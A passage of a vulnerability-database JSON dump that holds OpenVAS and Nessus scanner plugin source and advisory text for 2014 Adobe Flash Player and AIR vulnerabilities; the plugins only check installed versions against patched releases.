script_tag(name:\"creation_date\", value:\"2014-05-05 11:21:18 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for update openSUSE-SU-2014:0589-1 (update)\");\n\n tag_insight = \"\n This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n * bnc#875577, APSB14-13, CVE-2014-0515\";\n\n tag_affected = \"update on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0589_1\");\n script_summary(\"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.356~107.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.356~107.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.356~107.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-22T17:03:24", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-01T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0510", "CVE-2014-0506"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804350", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804350", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_mult_vuln01_apr14_win.nasl 2014-04-01 12:10:22Z Apr$\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804350\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0510\");\n script_bugtraq_id(66208, 66241);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-01 12:15:19 +0530 (Tue, 01 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaws exist due to an use-after-free error and some other unspecified error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to conduct denial of service or\npotentially execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 12.0.0.77 on Windows.\");\n script_tag(name:\"solution\", value:\"Upgrade Flash Player to version 13.0.0.182 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1029969\");\n script_xref(name:\"URL\", value:\"https://www.hkcert.org/my_url/en/alert/14033103\");\n script_xref(name:\"URL\", value:\"http://www.pwn2own.com/2014/03/pwn2own-results-for-wednesday-day-one\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version:playerVer, test_version:\"12.0.0.77\"))\n{\n report = report_fixed_ver(installed_version:playerVer, vulnerable_range:\"Equal to 12.0.0.77\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-06-02T14:09:40", "description": "The remote host is affected by the vulnerability described in GLSA-201405-04 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted SWF file using Adobe Flash Player, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "nessus", "title": "GLSA-201405-04 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502", "CVE-2014-0503", "CVE-2014-0504", "CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-0515"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201405-04.NASL", "href": "https://www.tenable.com/plugins/nessus/73860", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201405-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73860);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\", \"CVE-2014-0503\", \"CVE-2014-0504\", \"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\", \"CVE-2014-0515\");\n script_bugtraq_id(65702, 65703, 65704, 66122, 66127, 66208, 66699, 66701, 66703, 67092);\n script_xref(name:\"GLSA\", value:\"201405-04\");\n\n script_name(english:\"GLSA-201405-04 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201405-04\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file using Adobe Flash Player, possibly resulting in execution of\n arbitrary code with the privileges of the process or a Denial of Service\n condition. Furthermore, a remote attacker may be able to bypass the Same\n Origin Policy or read the clipboard via unspecified vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201405-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.356'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.356\"), vulnerable:make_list(\"lt 11.2.202.356\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:13", "description": "According to its version, the instance of Adobe AIR on the remote Windows host is 4.0.0.1628 or earlier. It is, therefore, potentially affected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross- site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Adobe AIR <= AIR 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB14-09.NASL", "href": "https://www.tenable.com/plugins/nessus/73432", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73432);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Adobe AIR <= AIR 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Adobe AIR on the remote\nWindows host is 4.0.0.1628 or earlier. It is, therefore, potentially\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/531839/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 13.0.0.83 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '4.0.0.1628';\nfix = '13.0.0.83';\nfix_ui = '13.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n # XSS\n set_kb_item(name:'www/'+port+'/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:32", "description": "An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin APSB14-09, listed in the References section.\n\nTwo flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0506, CVE-2014-0507)\n\nA flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0508)\n\nA flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0509)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.350.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0380.NASL", "href": "https://www.tenable.com/plugins/nessus/73451", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0380. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73451);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66208, 66699, 66701, 66703);\n script_xref(name:\"RHSA\", value:\"2014:0380\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0380)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nCritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-09, listed in the References section.\n\nTwo flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0506, CVE-2014-0507)\n\nA flaw in flash-plugin could allow an attacker to obtain sensitive\ninformation if a victim were tricked into visiting a specially crafted\nweb page. (CVE-2014-0508)\n\nA flaw in flash-plugin could allow an attacker to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a\nspecially crafted web page. (CVE-2014-0509)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.350.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0508\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0380\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.350-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.350-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "The remote host is missing KB2942844. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross- site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "MS KB2942844: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2942844.NASL", "href": "https://www.tenable.com/plugins/nessus/73418", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73418);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n script_xref(name:\"MSKB\", value:\"2942844\");\n\n script_name(english:\"MS KB2942844: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2942844. It is, therefore, affected by\nthe following vulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2942844/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2942844.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", 